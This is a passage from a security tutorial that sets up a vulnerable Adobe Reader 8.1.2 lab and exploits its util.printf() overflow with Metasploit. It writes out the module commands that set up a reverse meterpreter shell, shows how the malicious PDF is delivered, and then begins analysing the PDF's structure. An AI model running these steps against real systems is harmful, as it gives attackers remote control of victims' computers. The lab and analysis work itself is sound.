One of the first things we need to do is to remove the PDF Reader we currently have installed and reinstall the old version of PDF Reader.
The old version of PDF Reader can be found on various web pages, but most prominent web page is definitely oldapps. We need to search for a specific version of Adobe PDF Reader, which was vulnerable to the util.printf() buffer overflow vulnerability. But which version do we need? Luckily the exploit for the util.printf() buffer overflow vulnerability can be found in the Metasploit modules as we can see oin the picture below:
The vulnerable version of Adobe PDF Reader is 8.1.2 (including), which we need to download from the oldapps web page and install on the system. The installation process of the old vulnerable PDF Reader can be observed below:
When the installation process is complete, we can check whether the appropriate version was installed on the system. To do that, we can start the Adobe PDF Reader normally and click on Menu - Help - About Adobe Reader 8. We will see a picture presented below:
The right version of Adobe Reader is installed, which is the version 8.1.2. Now we've come to the part where we need to test the Metasploit module. In order to do that we must download the Metasploit, start the msfconsole, and execute the commands below:
msf > use exploit/windows/browser/adobe_utilprintf msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set LHOST 1 126.96.36.199 msf exploit(adobe_utilprintf) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.134:4444 [*] Using URL: http://0.0.0.0:8080/RoNPyF [*] Local IP: http://192.168.1.134:8080/RoNPyF [*] Server started.
First we're executing the command to use the adobe_utilprintf exploit. Then we're setting some common Metasploit variables that are required for everything to work. These variables are PAYLOAD, which specifies the payload that will be executed upon successful execution of the exploit and LHOST, which sets the IP of our meterpreter computer. This IP will be used by the payload to connect back to us, creating a reverse meterpreter session, which will give us complete access to the compromised computer. At the end we're executing the command exploit to run the configured actions.
We can download the generated malicious PDF from the URI http://192.168.1.134:8080/RoNPyF and save it on our hard drive as util_printf.pdf. Then we need to copy it to the target machine (the one running the vulnerable version of Adobe PDF Reader) and open it.
When we open the malicious PDF document in a vulnerable Adobe PDF Reader, a new meterpreter session should be opened as can be seen on the picture below:
We can then use the newly created session to interact with the compromised computer. This can be seen in the picture below, where we first enter into the new session with the "sessions -i 1 " command and then execute the sysinfo command, giving us the basic information about the compromised system. In our case, this is a Windows XP SP2 machine running on x86 (32 bit) architecture.
2. Analyzing the PDF Document
The exploit works and gives us the meterpreter session that we want, so why should we care about the details of how this is done? Well, the beauty of everything is in the details, so in this section we'll take a look at how the malicious PDF document was created and how it uses the vulnerable function to execute arbitrary code on the vulnerable computer.
If we open the util_printf.pdf PDF document in a text editor like gvim, we can get some information out of it, but not all of it. For example, the Header of the PDF document is presented in the picture below:
It's a standard 1.5 PDF document with 4 random unicode bytes in the second line. Those bytes are there for one reason only: so that the applications that work with ASCII data don't try to handle and open the document, as it would fail. And the bytes are at the beginning of the file, because applications normally read a first few bytes of the file to determine if they can handle the specific file and open it. Then there is the Body PDF section that is presented in the picture below:
We can't really say anything definitive about this section, except that it uses a lot of different representation of any single character. The character # followed by two characters is a single character represented in a hexadecimal notation. This could be easily changed back into the ASCII form, but we won't do that manually, because it isn't efficient and it's too time consuming (in the modern world we have computers to do the work for us).
In the picture above we also have one encrypted stream, which is non-recognizable right now. In line 29 that stream is terminated by the endstream and on line 30 with endobj keywords. What follows is the Xref table, which we can see in the following picture:
The cross-reference table uses 6 objects. The first object with an offset 0x0 and the generation number 65535 is always present and is not used. The other objects are represented by the following lines. The first used object is located at the byte offset 17 and contains the generation number 0. In fact, all of the objects contain generation number 0, because the PDF document has just been created, and we haven't changed any of the objects in the PDF document, which would cause the generation number to increase. The cross-reference table is clear and provides just the information that we need: there are 6 used objects with different byte offsets usually present in the body of the PDF document (which is encrypted and obfuscated).
What follows is the Trailer section of the PDF document represented in the picture below:
The Trailer contains the /Root element specifying the root object to be the object with an ID 1. There's also the /Size attribute telling us that there are six objects in use (the number 7 is there specifying one more object than there actually is). Afterwards there's the startxref keyword specifying that the cross-reference table starts at byte offset 6386. The last line ends the PDF document file format.
So far we've gathered quite some information about the malicious PDF document, but there's still one section that needs to be analyzed: the Body section of the PDF document. We must be aware of the fact that Adobe documents can use several filters to compress or encode specific objects in the PDF document, making them unreadable in plain-text format. Therefore we can't easily read the object from a PDF file, but need to decompress or decrypt the objects before displaying it on the screen. There are several tools that we can use to do just that.
In the chapters that follow, we'll present various tools that can be used to analyze malicious files. We'll also pretend that we don't know anything about the malicious PDF that we're analyzing, so we'll try almost every possible method out there to try to determine if the PDF document is malicious and how.
We can decompress the compressed data in PDF document util_printf.pdf with the following command:
# python pdf.py util_printf.pdf
Whenever the above command is run, we get the following output, which prints all the objects from the PDF document. Previously we found out that the PDF document uses six objects with IDs 1 through 6. The first part of the output presents the attributes of each object. The object with an ID 1 is a document catalog that specifies the document's page root node, which is object with an ID 3. The outlines object has an ID 2.
OpenAction specifies the destination that shall be displayed when the document is opened. The value can be an array defining a destination or an action dictionary representing an action. If this entry is not present, the document will be opened on the first page by default.
All the objects can be better represented with the picture below: